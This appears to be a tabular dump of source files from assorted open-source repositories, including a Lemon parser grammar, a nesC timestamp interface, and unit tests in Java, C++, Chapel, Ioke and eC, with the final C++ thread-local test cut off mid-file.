content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
{% set result = 'abcd' | regex_search('^(.*)BC(.*)$', ignorecase=True) %} {% include 'jinja_filters/common.sls' %}
SaltStack
4
byteskeptical/salt
tests/integration/files/file/base/jinja_filters/jinja_regex_search.sls
[ "Apache-2.0" ]
use("ispec") use("blank_slate") describe("BlankSlate", describe("create", it("should be possible to create a new one with it", aNew = BlankSlate create( fn(bs, bs pass = macro(call [call message name, call evaluatedArguments]))) aNew foo should == [:foo, []] aNew foo(42+2, 13) should == [:foo, [44, 13]] ) ) )
Ioke
3
olabini/ioke
test/blank_slate_spec.ik
[ "ICU", "MIT" ]
/* * Copyright (c) 2007, Vanderbilt University * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * - Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * - Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the * distribution. * - Neither the name of the copyright holders nor the names of * its contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * * Author: Miklos Maroti */ interface PacketTimeStamp<precision_tag, size_type> { /** * @param 'message_t *ONE msg' Message to examine. * * Returns TRUE if the time stamp of the message is valid. Under special * circumstances the radio chip might not be able to correctly assign a * precise time value to an incoming packet (e.g. under very heavy traffic * multiple interrupts can occur before they could be serviced, and even * if capture registers are used, it is not possible to get the time stamp * for the first or last unserviced event), in which case the time stamp * value should not be used. It is recommended that the isValid command be * called from the receive or sendDone event handler. */ async command bool isValid(message_t* msg); /** * @param 'message_t *ONE msg' Message to get timestamp from. * * Return the time stamp for the given message. Please check with the * isValid command if this value can be relied upon. If this command is * called after transmission, then the transmit time of the packet * is returned (the time when the frame synchronization byte was * transmitted). If this command is called after the message is received, * the tne receive time of the message is returned. It is recommended that * the timestamp command be called only from the receive or sendDone event * handler. */ async command size_type timestamp(message_t* msg); /** * @param 'message_t *ONE msg' Message to modify. * * Sets the isValid flag to FALSE. */ async command void clear(message_t* msg); /** * @param 'message_t *ONE msg' Message to modify. * * Sets the isValid flag to TRUE and the time stamp value to the * specified value. */ async command void set(message_t* msg, size_type value); }
nesC
5
realbotty/tree-sitter-nesc
test/examples/PacketTimeStamp.nc
[ "MIT" ]
/** * @file NCDConfigParser.y * @author Ambroz Bizjak <ambrop7@gmail.com> * * @section LICENSE * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the author nor the * names of its contributors may be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ %include { #include <string.h> #include <stddef.h> #include <misc/debug.h> #include <misc/concat_strings.h> #include <ncd/NCDAst.h> struct parser_out { int out_of_memory; int syntax_error; int have_ast; NCDProgram ast; }; struct token { char *str; size_t len; }; struct program { int have; NCDProgram v; }; struct block { int have; NCDBlock v; }; struct statement { int have; NCDStatement v; }; struct ifblock { int have; NCDIfBlock v; }; struct value { int have; NCDValue v; }; static void free_token (struct token o) { free(o.str); } static void free_program (struct program o) { if (o.have) NCDProgram_Free(&o.v); } static void free_block (struct block o) { if (o.have) NCDBlock_Free(&o.v); } static void free_statement (struct statement o) { if (o.have) NCDStatement_Free(&o.v); } static void free_ifblock (struct ifblock o) { if (o.have) NCDIfBlock_Free(&o.v); } static void free_value (struct value o) { if (o.have) NCDValue_Free(&o.v); } } %extra_argument { struct parser_out *parser_out } %token_type { struct token } %token_destructor { free_token($$); } %type processes { struct program } %type statement { struct statement } %type elif_maybe { struct ifblock } %type elif { struct ifblock } %type else_maybe { struct block } %type statements { struct block } %type dotted_name { char * } %type list_contents_maybe { struct value } %type list_contents { struct value } %type list { struct value } %type map_contents { struct value } %type map { struct value } %type invoc { struct value } %type value { struct value } %type name_maybe { char * } %type process_or_template { int } %type name_list { struct value } %type interrupt_maybe { struct block } // mention parser_out in some destructor to avoid an unused-variable warning %destructor processes { (void)parser_out; free_program($$); } %destructor statement { free_statement($$); } %destructor elif_maybe { free_ifblock($$); } %destructor elif { free_ifblock($$); } %destructor else_maybe { free_block($$); } %destructor statements { free_block($$); } %destructor dotted_name { free($$); } %destructor list_contents_maybe { free_value($$); } %destructor list_contents { free_value($$); } %destructor list { free_value($$); } %destructor map_contents { free_value($$); } %destructor map { free_value($$); } %destructor invoc { free_value($$); } %destructor value { free_value($$); } %destructor name_maybe { free($$); } %destructor name_list { free_value($$); } %destructor interrupt_maybe { free_block($$); } %stack_size 0 %syntax_error { parser_out->syntax_error = 1; } // workaroud Lemon bug: if the stack overflows, the token that caused the overflow will be leaked %stack_overflow { if (yypMinor) { free_token(yypMinor->yy0); } } input ::= processes(A). { ASSERT(!parser_out->have_ast) if (A.have) { parser_out->have_ast = 1; parser_out->ast = A.v; } } processes(R) ::= . { NCDProgram prog; NCDProgram_Init(&prog); R.have = 1; R.v = prog; } processes(R) ::= INCLUDE STRING(A) processes(N). { ASSERT(A.str) if (!N.have) { goto failA0; } NCDProgramElem elem; if (!NCDProgramElem_InitInclude(&elem, A.str, A.len)) { goto failA0; } if (!NCDProgram_PrependElem(&N.v, elem)) { goto failA1; } R.have = 1; R.v = N.v; N.have = 0; goto doneA; failA1: NCDProgramElem_Free(&elem); failA0: R.have = 0; parser_out->out_of_memory = 1; doneA: free_token(A); free_program(N); } processes(R) ::= INCLUDE_GUARD STRING(A) processes(N). { ASSERT(A.str) if (!N.have) { goto failZ0; } NCDProgramElem elem; if (!NCDProgramElem_InitIncludeGuard(&elem, A.str, A.len)) { goto failZ0; } if (!NCDProgram_PrependElem(&N.v, elem)) { goto failZ1; } R.have = 1; R.v = N.v; N.have = 0; goto doneZ; failZ1: NCDProgramElem_Free(&elem); failZ0: R.have = 0; parser_out->out_of_memory = 1; doneZ: free_token(A); free_program(N); } processes(R) ::= process_or_template(T) NAME(A) CURLY_OPEN statements(B) CURLY_CLOSE processes(N). { ASSERT(A.str) if (!B.have || !N.have) { goto failB0; } NCDProcess proc; if (!NCDProcess_Init(&proc, T, A.str, B.v)) { goto failB0; } B.have = 0; NCDProgramElem elem; NCDProgramElem_InitProcess(&elem, proc); if (!NCDProgram_PrependElem(&N.v, elem)) { goto failB1; } R.have = 1; R.v = N.v; N.have = 0; goto doneB; failB1: NCDProgramElem_Free(&elem); failB0: R.have = 0; parser_out->out_of_memory = 1; doneB: free_token(A); free_block(B); free_program(N); } statement(R) ::= dotted_name(A) ROUND_OPEN list_contents_maybe(B) ROUND_CLOSE name_maybe(C) SEMICOLON. { if (!A || !B.have) { goto failC0; } if (!NCDStatement_InitReg(&R.v, C, NULL, A, B.v)) { goto failC0; } B.have = 0; R.have = 1; goto doneC; failC0: R.have = 0; parser_out->out_of_memory = 1; doneC: free(A); free_value(B); free(C); } statement(R) ::= dotted_name(M) ARROW dotted_name(A) ROUND_OPEN list_contents_maybe(B) ROUND_CLOSE name_maybe(C) SEMICOLON. { if (!M || !A || !B.have) { goto failD0; } if (!NCDStatement_InitReg(&R.v, C, M, A, B.v)) { goto failD0; } B.have = 0; R.have = 1; goto doneD; failD0: R.have = 0; parser_out->out_of_memory = 1; doneD: free(M); free(A); free_value(B); free(C); } statement(R) ::= IF ROUND_OPEN value(A) ROUND_CLOSE CURLY_OPEN statements(B) CURLY_CLOSE elif_maybe(I) else_maybe(E) name_maybe(C) SEMICOLON. { if (!A.have || !B.have || !I.have) { goto failE0; } NCDIf ifc; NCDIf_Init(&ifc, A.v, B.v); A.have = 0; B.have = 0; if (!NCDIfBlock_PrependIf(&I.v, ifc)) { NCDIf_Free(&ifc); goto failE0; } if (!NCDStatement_InitIf(&R.v, C, I.v, NCDIFTYPE_IF)) { goto failE0; } I.have = 0; if (E.have) { NCDStatement_IfAddElse(&R.v, E.v); E.have = 0; } R.have = 1; goto doneE; failE0: R.have = 0; parser_out->out_of_memory = 1; doneE: free_value(A); free_block(B); free_ifblock(I); free_block(E); free(C); } statement(R) ::= FOREACH ROUND_OPEN value(A) AS NAME(B) ROUND_CLOSE CURLY_OPEN statements(S) CURLY_CLOSE name_maybe(N) SEMICOLON. { if (!A.have || !B.str || !S.have) { goto failEA0; } if (!NCDStatement_InitForeach(&R.v, N, A.v, B.str, NULL, S.v)) { goto failEA0; } A.have = 0; S.have = 0; R.have = 1; goto doneEA0; failEA0: R.have = 0; parser_out->out_of_memory = 1; doneEA0: free_value(A); free_token(B); free_block(S); free(N); } statement(R) ::= FOREACH ROUND_OPEN value(A) AS NAME(B) COLON NAME(C) ROUND_CLOSE CURLY_OPEN statements(S) CURLY_CLOSE name_maybe(N) SEMICOLON. { if (!A.have || !B.str || !C.str || !S.have) { goto failEB0; } if (!NCDStatement_InitForeach(&R.v, N, A.v, B.str, C.str, S.v)) { goto failEB0; } A.have = 0; S.have = 0; R.have = 1; goto doneEB0; failEB0: R.have = 0; parser_out->out_of_memory = 1; doneEB0: free_value(A); free_token(B); free_token(C); free_block(S); free(N); } elif_maybe(R) ::= . { NCDIfBlock_Init(&R.v); R.have = 1; } elif_maybe(R) ::= elif(A). { R = A; } elif(R) ::= ELIF ROUND_OPEN value(A) ROUND_CLOSE CURLY_OPEN statements(B) CURLY_CLOSE. { if (!A.have || !B.have) { goto failF0; } NCDIfBlock_Init(&R.v); NCDIf ifc; NCDIf_Init(&ifc, A.v, B.v); A.have = 0; B.have = 0; if (!NCDIfBlock_PrependIf(&R.v, ifc)) { goto failF1; } R.have = 1; goto doneF0; failF1: NCDIf_Free(&ifc); NCDIfBlock_Free(&R.v); failF0: R.have = 0; parser_out->out_of_memory = 1; doneF0: free_value(A); free_block(B); } elif(R) ::= ELIF ROUND_OPEN value(A) ROUND_CLOSE CURLY_OPEN statements(B) CURLY_CLOSE elif(N). { if (!A.have || !B.have || !N.have) { goto failG0; } NCDIf ifc; NCDIf_Init(&ifc, A.v, B.v); A.have = 0; B.have = 0; if (!NCDIfBlock_PrependIf(&N.v, ifc)) { goto failG1; } R.have = 1; R.v = N.v; N.have = 0; goto doneG0; failG1: NCDIf_Free(&ifc); failG0: R.have = 0; parser_out->out_of_memory = 1; doneG0: free_value(A); free_block(B); free_ifblock(N); } else_maybe(R) ::= . { R.have = 0; } else_maybe(R) ::= ELSE CURLY_OPEN statements(B) CURLY_CLOSE. { R = B; } statement(R) ::= BLOCK CURLY_OPEN statements(S) CURLY_CLOSE name_maybe(N) SEMICOLON. { if (!S.have) { goto failGA0; } if (!NCDStatement_InitBlock(&R.v, N, S.v)) { goto failGA0; } S.have = 0; R.have = 1; goto doneGA0; failGA0: R.have = 0; parser_out->out_of_memory = 1; doneGA0: free_block(S); free(N); } interrupt_maybe(R) ::= . { R.have = 0; } interrupt_maybe(R) ::= TOKEN_INTERRUPT CURLY_OPEN statements(S) CURLY_CLOSE. { R = S; } statement(R) ::= TOKEN_DO CURLY_OPEN statements(S) CURLY_CLOSE interrupt_maybe(I) name_maybe(N) SEMICOLON. { if (!S.have) { goto failGB0; } NCDIfBlock if_block; NCDIfBlock_Init(&if_block); if (I.have) { NCDIf int_if; NCDIf_InitBlock(&int_if, I.v); I.have = 0; if (!NCDIfBlock_PrependIf(&if_block, int_if)) { NCDIf_Free(&int_if); goto failGB1; } } NCDIf the_if; NCDIf_InitBlock(&the_if, S.v); S.have = 0; if (!NCDIfBlock_PrependIf(&if_block, the_if)) { NCDIf_Free(&the_if); goto failGB1; } if (!NCDStatement_InitIf(&R.v, N, if_block, NCDIFTYPE_DO)) { goto failGB1; } R.have = 1; goto doneGB0; failGB1: NCDIfBlock_Free(&if_block); failGB0: R.have = 0; parser_out->out_of_memory = 1; doneGB0: free_block(S); free_block(I); free(N); } statements(R) ::= statement(A). { if (!A.have) { goto failH0; } NCDBlock_Init(&R.v); if (!NCDBlock_PrependStatement(&R.v, A.v)) { goto failH1; } A.have = 0; R.have = 1; goto doneH; failH1: NCDBlock_Free(&R.v); failH0: R.have = 0; parser_out->out_of_memory = 1; doneH: free_statement(A); } statements(R) ::= statement(A) statements(N). { if (!A.have || !N.have) { goto failI0; } if (!NCDBlock_PrependStatement(&N.v, A.v)) { goto failI1; } A.have = 0; R.have = 1; R.v = N.v; N.have = 0; goto doneI; failI1: NCDBlock_Free(&R.v); failI0: R.have = 0; parser_out->out_of_memory = 1; doneI: free_statement(A); free_block(N); } dotted_name(R) ::= NAME(A). { ASSERT(A.str) R = A.str; } dotted_name(R) ::= NAME(A) DOT dotted_name(N). { ASSERT(A.str) if (!N) { goto failJ0; } if (!(R = concat_strings(3, A.str, ".", N))) { goto failJ0; } goto doneJ; failJ0: R = NULL; parser_out->out_of_memory = 1; doneJ: free_token(A); free(N); } name_list(R) ::= NAME(A). { if (!A.str) { goto failK0; } NCDValue_InitList(&R.v); NCDValue this_string; if (!NCDValue_InitString(&this_string, A.str)) { goto failK1; } if (!NCDValue_ListPrepend(&R.v, this_string)) { goto failK2; } R.have = 1; goto doneK; failK2: NCDValue_Free(&this_string); failK1: NCDValue_Free(&R.v); failK0: R.have = 0; parser_out->out_of_memory = 1; doneK: free_token(A); } name_list(R) ::= NAME(A) DOT name_list(N). { if (!A.str || !N.have) { goto failKA0; } NCDValue this_string; if (!NCDValue_InitString(&this_string, A.str)) { goto failKA0; } if (!NCDValue_ListPrepend(&N.v, this_string)) { goto failKA1; } R.have = 1; R.v = N.v; N.have = 0; goto doneKA; failKA1: NCDValue_Free(&this_string); failKA0: R.have = 0; parser_out->out_of_memory = 1; doneKA: free_token(A); free_value(N); } list_contents_maybe(R) ::= . { R.have = 1; NCDValue_InitList(&R.v); } list_contents_maybe(R) ::= list_contents(A). { R = A; } list_contents(R) ::= value(A). { if (!A.have) { goto failL0; } NCDValue_InitList(&R.v); if (!NCDValue_ListPrepend(&R.v, A.v)) { goto failL1; } A.have = 0; R.have = 1; goto doneL; failL1: NCDValue_Free(&R.v); failL0: R.have = 0; parser_out->out_of_memory = 1; doneL: free_value(A); } list_contents(R) ::= value(A) COMMA list_contents(N). { if (!A.have || !N.have) { goto failM0; } if (!NCDValue_ListPrepend(&N.v, A.v)) { goto failM0; } A.have = 0; R.have = 1; R.v = N.v; N.have = 0; goto doneM; failM0: R.have = 0; parser_out->out_of_memory = 1; doneM: free_value(A); free_value(N); } list(R) ::= CURLY_OPEN CURLY_CLOSE. { R.have = 1; NCDValue_InitList(&R.v); } list(R) ::= CURLY_OPEN list_contents(A) CURLY_CLOSE. { R = A; } map_contents(R) ::= value(A) COLON value(B). { if (!A.have || !B.have) { goto failS0; } NCDValue_InitMap(&R.v); if (!NCDValue_MapPrepend(&R.v, A.v, B.v)) { goto failS1; } A.have = 0; B.have = 0; R.have = 1; goto doneS; failS1: NCDValue_Free(&R.v); failS0: R.have = 0; parser_out->out_of_memory = 1; doneS: free_value(A); free_value(B); } map_contents(R) ::= value(A) COLON value(B) COMMA map_contents(N). { if (!A.have || !B.have || !N.have) { goto failT0; } if (!NCDValue_MapPrepend(&N.v, A.v, B.v)) { goto failT0; } A.have = 0; B.have = 0; R.have = 1; R.v = N.v; N.have = 0; goto doneT; failT0: R.have = 0; parser_out->out_of_memory = 1; doneT: free_value(A); free_value(B); free_value(N); } map(R) ::= BRACKET_OPEN BRACKET_CLOSE. { R.have = 1; NCDValue_InitMap(&R.v); } map(R) ::= BRACKET_OPEN map_contents(A) BRACKET_CLOSE. { R = A; } invoc(R) ::= value(F) ROUND_OPEN list_contents_maybe(A) ROUND_CLOSE. { if (!F.have || !A.have) { goto failQ0; } if (!NCDValue_InitInvoc(&R.v, F.v, A.v)) { goto failQ0; } F.have = 0; A.have = 0; R.have = 1; goto doneQ; failQ0: R.have = 0; parser_out->out_of_memory = 1; doneQ: free_value(F); free_value(A); } value(R) ::= STRING(A). { ASSERT(A.str) if (!NCDValue_InitStringBin(&R.v, (uint8_t *)A.str, A.len)) { goto failU0; } R.have = 1; goto doneU; failU0: R.have = 0; parser_out->out_of_memory = 1; doneU: free_token(A); } value(R) ::= AT_SIGN dotted_name(A). { if (!A) { goto failUA0; } if (!NCDValue_InitString(&R.v, A)) { goto failUA0; } R.have = 1; goto doneUA0; failUA0: R.have = 0; parser_out->out_of_memory = 1; doneUA0: free(A); } value(R) ::= CARET name_list(A). { R = A; } value(R) ::= dotted_name(A). { if (!A) { goto failV0; } if (!NCDValue_InitVar(&R.v, A)) { goto failV0; } R.have = 1; goto doneV; failV0: R.have = 0; parser_out->out_of_memory = 1; doneV: free(A); } value(R) ::= list(A). { R = A; } value(R) ::= map(A). { R = A; } value(R) ::= ROUND_OPEN value(A) ROUND_CLOSE. { R = A; } value(R) ::= invoc(A). { R = A; } name_maybe(R) ::= . { R = NULL; } name_maybe(R) ::= NAME(A). { ASSERT(A.str) R = A.str; } process_or_template(R) ::= PROCESS. { R = 0; } process_or_template(R) ::= TEMPLATE. { R = 1; }
Yacc
5
WqyJh/badvpn
ncd/NCDConfigParser_parse.y
[ "BSD-3-Clause" ]
.class {-webkit-box-sizing:border-box;box-sizing:border-box }
CSS
0
fuelingtheweb/prettier
tests/stylefmt/vendor-prefix/vendor-prefix.css
[ "MIT" ]
--TEST-- EXPECTF_EXTERNAL --FILE-- 123 -123 +123 +1.1 abc 0abc x --EXPECTF_EXTERNAL-- test012.txt
PHP
2
jrchamp/php-src
tests/run-test/test012.phpt
[ "PHP-3.01" ]
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;"> <div><span class="message_content"> <pre class="special_formatting"><font face="Calibri"><span style="font-size: 15px;">Hi Jeff, Quick update on the event bugs: - I fixed the bug where events would be incorrectly marked as read-only. - We expose RRULEs as valid JSON now. We're currently testing the fixes, they should ship early next week. Concerning timezones, an event should always be associated with a timezone. Having a NULL value instead is a bug on our end. I will be working on fixing this on Monday and will let you know when it's fixed. Thanks for your detailed bug reports,</span></font></pre> <pre class="special_formatting"><font face="Calibri"><span style="font-size: 15px;"> Karim</span></font></pre> <pre class="special_formatting" style="color: rgb(0, 0, 0); font-family: Calibri, sans-serif; font-size: 14px;"><span style="font-family: Calibri; font-size: 11pt; font-weight: bold;">From: </span><span style="font-family: Calibri; font-size: 11pt;"> Kavya Joshi &lt;</span><a href="mailto:kavya@nylas.com" style="font-family: Calibri; font-size: 11pt;">kavya@nylas.com</a><span style="font-family: Calibri; font-size: 11pt;">&gt;</span></pre> </span></div> </body>
HTML
0
cnheider/nylas-mail
packages/client-app/spec/fixtures/emails/email_1_stripped.html
[ "MIT" ]
#include "foo.h" import "ecere" class Form1 : Window { Button button1 { caption = "Click " "Here", foreground = red; }; bool OnCreate( ` void OnCreate() { MessageBox mb { contents = $"Hello, world!!" }; mb.Modal(); MessageBox { contents = $"Hello"."Hello, world!!", anchor.bottom = 20 }.Modal(); MessageBox mb; mb = { }; } // This is a comment Button button1 { caption = "Click Here"; foreground = red; /*bool */NotifyClicked(Button button, int x, int y, Modifiers mods) { MessageBox { contents = "Hello, world!!" }.Modal(); return true; } }; int a = 10; anchor.right = 10; caption = "Form1"; background = formColor; borderStyle = sizable; hasMaximize = true; hasMinimize = true; hasClose = true; clientSize = { 632, 438 }; }; Form1 form1 { caption = "My Form" }; struct InventoryItem { float price = 5; String name; price = 10.0f; } item, * itemPtr; class SomeClass { } int a; typedef int bla; int SomeFunction(int * p) { int hex = 0x1234; float scientific = 1.456E23; float scientific2 = 1.456E+23; int b[3][4] = { { 1, 0, 0, 0 }, { 0, 1, 0, 0 }, { 0, 0, 1, 0 } }; int c, d, e = 4; const String name = "Foo"; char character = 'a'; unichar unicode = '愛'; b * a; bla blo; b = ((a + 3) * a) - (3.1415 * 180 / a); a = b = 5*(2 + 10); again: switch(a) { case 0: PrintLn("0"); printf(""); break; case 1: PrintLn("1"); printf(""); break; case 2: PrintLn("2"); printf(""); break; case 3: switch(b) { case 4: PrintLn("Cool"); break; case 5: PrintLn("Awesome"); break; default: PrintLn("Unbelievable"); } break; } if(!strcmp(name, "Foo")) goto again; for(c = 0; c < 10; c++) PrintLn(c); if(a) if(b) s; else s2; if(a == 4) // { if(a == 3) PrintLn("3!"); // } else PrintLn("not 4, nor 3!"); c = !b || a ^ b == a < b; b = 4 << 5 + a[b]->cool("nice") & 32; return eC.awesomeness <<= 1; } //3 + 4 * 2 //1 * 2 * 3 * 4 //-10 *23
eC
3
N-eil/ecere-sdk
compiler/libec2/test.ec
[ "BSD-3-Clause" ]
fun fibonacci 0 = 0 | fibonacci 1 = 1 | fibonacci n = fibonacci(n-1) + fibonacci(n-2); fibonacci 0; fibonacci 1; fibonacci 2; fibonacci 3;
Standard ML
3
PushpneetSingh/Hello-world
SMLNJ/fibonacci.sml
[ "MIT" ]
package com.baeldung.splitkeepdelimiters; import static org.assertj.core.api.Assertions.assertThat; import java.util.regex.Pattern; import org.apache.commons.lang3.StringUtils; import org.junit.jupiter.api.Test; import com.google.common.base.Splitter; public class SplitAndKeepDelimitersUnitTest { private final String positivelookAheadRegex = "((?=@))"; private final String positivelookBehindRegex = "((?<=@))"; private final String positivelookAroundRegex = "((?=@)|(?<=@))"; private final String positiveLookAroundMultiDelimiterRegex = "((?=:|#|@)|(?<=:|#|@))"; private String text = "Hello@World@This@Is@A@Java@Program"; private String textMixed = "@HelloWorld@This:Is@A#Java#Program"; private String textMixed2 = "pg@no;10@hello;world@this;is@a#10words;Java#Program"; @Test public void givenString_splitAndKeepDelimiters_using_javaLangString() { assertThat(text.split(positivelookAheadRegex)).containsExactly("Hello", "@World", "@This", "@Is", "@A", "@Java", "@Program"); assertThat(text.split(positivelookBehindRegex)).containsExactly("Hello@", "World@", "This@", "Is@", "A@", "Java@", "Program"); assertThat(text.split(positivelookAroundRegex)).containsExactly("Hello", "@", "World", "@", "This", "@", "Is", "@", "A", "@", "Java", "@", "Program"); assertThat(textMixed.split(positiveLookAroundMultiDelimiterRegex)).containsExactly("@", "HelloWorld", "@", "This", ":", "Is", "@", "A", "#", "Java", "#", "Program"); } @Test public void givenString_splitAndKeepDelimiters_using_ApacheCommonsLang3StringUtils() { assertThat(StringUtils.splitByCharacterType(textMixed2)).containsExactly("pg", "@", "no", ";", "10", "@", "hello", ";", "world", "@", "this", ";", "is", "@", "a", "#", "10", "words", ";", "J", "ava", "#", "P", "rogram"); } @Test public void givenString_splitAndKeepDelimiters_using_GuavaSplitter() { assertThat(Splitter.onPattern(positivelookAroundRegex) .splitToList(text)).containsExactly("Hello", "@", "World", "@", "This", "@", "Is", "@", "A", "@", "Java", "@", "Program"); assertThat(Splitter.on(Pattern.compile(positivelookAroundRegex)) .splitToList(text)).containsExactly("Hello", "@", "World", "@", "This", "@", "Is", "@", "A", "@", "Java", "@", "Program"); assertThat(Splitter.onPattern(positiveLookAroundMultiDelimiterRegex) .splitToList(textMixed)).containsExactly("@", "HelloWorld", "@", "This", ":", "Is", "@", "A", "#", "Java", "#", "Program"); assertThat(Splitter.on(Pattern.compile(positiveLookAroundMultiDelimiterRegex)) .splitToList(textMixed)).containsExactly("@", "HelloWorld", "@", "This", ":", "Is", "@", "A", "#", "Java", "#", "Program"); } }
Java
5
DBatOWL/tutorials
core-java-modules/core-java-string-operations-3/src/test/java/com/baeldung/splitkeepdelimiters/SplitAndKeepDelimitersUnitTest.java
[ "MIT" ]
proc test1() { var D1 = {1..4}; ref E1 = D1; writeln(E1); } proc test2() { var A2: [1..4] int; ref B2 = A2; writeln(B2); } proc test3() { var A3: [1..4] int; ref B3 = A3[2..3]; writeln(B3); } proc main() { test1(); test2(); test3(); }
Chapel
4
jhh67/chapel
test/variables/vass/ref-to-domains-arrays.chpl
[ "ECL-2.0", "Apache-2.0" ]
#include <c10/util/ThreadLocal.h> #include <gtest/gtest.h> #include <atomic> #include <thread> namespace { TEST(ThreadLocal, TestNoOpScopeWithOneVar) { C10_DEFINE_TLS_static(std::string, str); } TEST(ThreadLocalTest, TestNoOpScopeWithTwoVars) { C10_DEFINE_TLS_static(std::string, str); C10_DEFINE_TLS_static(std::string, str2); } TEST(ThreadLocalTest, TestScopeWithOneVar) { C10_DEFINE_TLS_static(std::string, str); EXPECT_EQ(*str, std::string()); EXPECT_EQ(*str, ""); *str = "abc"; EXPECT_EQ(*str, "abc"); EXPECT_EQ(str->length(), 3); EXPECT_EQ(str.get(), "abc"); } TEST(ThreadLocalTest, TestScopeWithTwoVars) { C10_DEFINE_TLS_static(std::string, str); EXPECT_EQ(*str, ""); C10_DEFINE_TLS_static(std::string, str2); *str = "abc"; EXPECT_EQ(*str, "abc"); EXPECT_EQ(*str2, ""); *str2 = *str; EXPECT_EQ(*str, "abc"); EXPECT_EQ(*str2, "abc"); str->clear(); EXPECT_EQ(*str, ""); EXPECT_EQ(*str2, "abc"); } TEST(ThreadLocalTest, TestInnerScopeWithTwoVars) { C10_DEFINE_TLS_static(std::string, str); *str = "abc"; { C10_DEFINE_TLS_static(std::string, str2); EXPECT_EQ(*str2, ""); *str2 = *str; EXPECT_EQ(*str, "abc"); EXPECT_EQ(*str2, "abc"); str->clear(); EXPECT_EQ(*str2, "abc"); } EXPECT_EQ(*str, ""); } struct Foo { C10_DECLARE_TLS_class_static(Foo, std::string, str_); }; C10_DEFINE_TLS_class_static(Foo, std::string, str_); TEST(ThreadLocalTest, TestClassScope) { EXPECT_EQ(*Foo::str_, ""); *Foo::str_ = "abc"; EXPECT_EQ(*Foo::str_, "abc"); EXPECT_EQ(Foo::str_->length(), 3); EXPECT_EQ(Foo::str_.get(), "abc"); } C10_DEFINE_TLS_static(std::string, global_); C10_DEFINE_TLS_static(std::string, global2_); TEST(ThreadLocalTest, TestTwoGlobalScopeVars) { EXPECT_EQ(*global_, ""); EXPECT_EQ(*global2_, ""); *global_ = "abc"; EXPECT_EQ(global_->length(), 3); EXPECT_EQ(*global_, "abc"); EXPECT_EQ(*global2_, ""); *global2_ = *global_; EXPECT_EQ(*global_, "abc"); EXPECT_EQ(*global2_, "abc"); global_->clear(); EXPECT_EQ(*global_, ""); EXPECT_EQ(*global2_, "abc"); EXPECT_EQ(global2_.get(), "abc"); } C10_DEFINE_TLS_static(std::string, global3_); TEST(ThreadLocalTest, TestGlobalWithLocalScopeVars) { *global3_ = "abc"; C10_DEFINE_TLS_static(std::string, str); std::swap(*global3_, *str); EXPECT_EQ(*str, "abc"); EXPECT_EQ(*global3_, ""); } TEST(ThreadLocalTest, TestThreadWithLocalScopeVar) { C10_DEFINE_TLS_static(std::string, str); *str = "abc"; std::atomic_bool b(false); std::thread t([&b]() { EXPECT_EQ(*str, ""); *str = "def"; b = true; EXPECT_EQ(*str, "def"); }); t.join(); EXPECT_TRUE(b); EXPECT_EQ(*str, "abc"); } C10_DEFINE_TLS_static(std::string, global4_); TEST(ThreadLocalTest, TestThreadWithGlobalScopeVar) { *global4_ = "abc"; std::atomic_bool b(false); std::thread t([&b]() { EXPECT_EQ(*global4_, ""); *global4_ = "def"; b = true; EXPECT_EQ(*global4_, "def"); }); t.join(); EXPECT_TRUE(b); EXPECT_EQ(*global4_, "abc"); } TEST(ThreadLocalTest, TestObjectsAreReleased) { static std::atomic<int> ctors{0}; static std::atomic<int> dtors{0}; struct A { A() : i() { ++ctors; } ~A() { ++dtors; } A(const A&) = delete; A& operator=(const A&) = delete; int i; }; C10_DEFINE_TLS_static(A, a); std::atomic_bool b(false); std::thread t([&b]() { EXPECT_EQ(a->i, 0); a->i = 1; EXPECT_EQ(a->i, 1); b = true; }); t.join(); 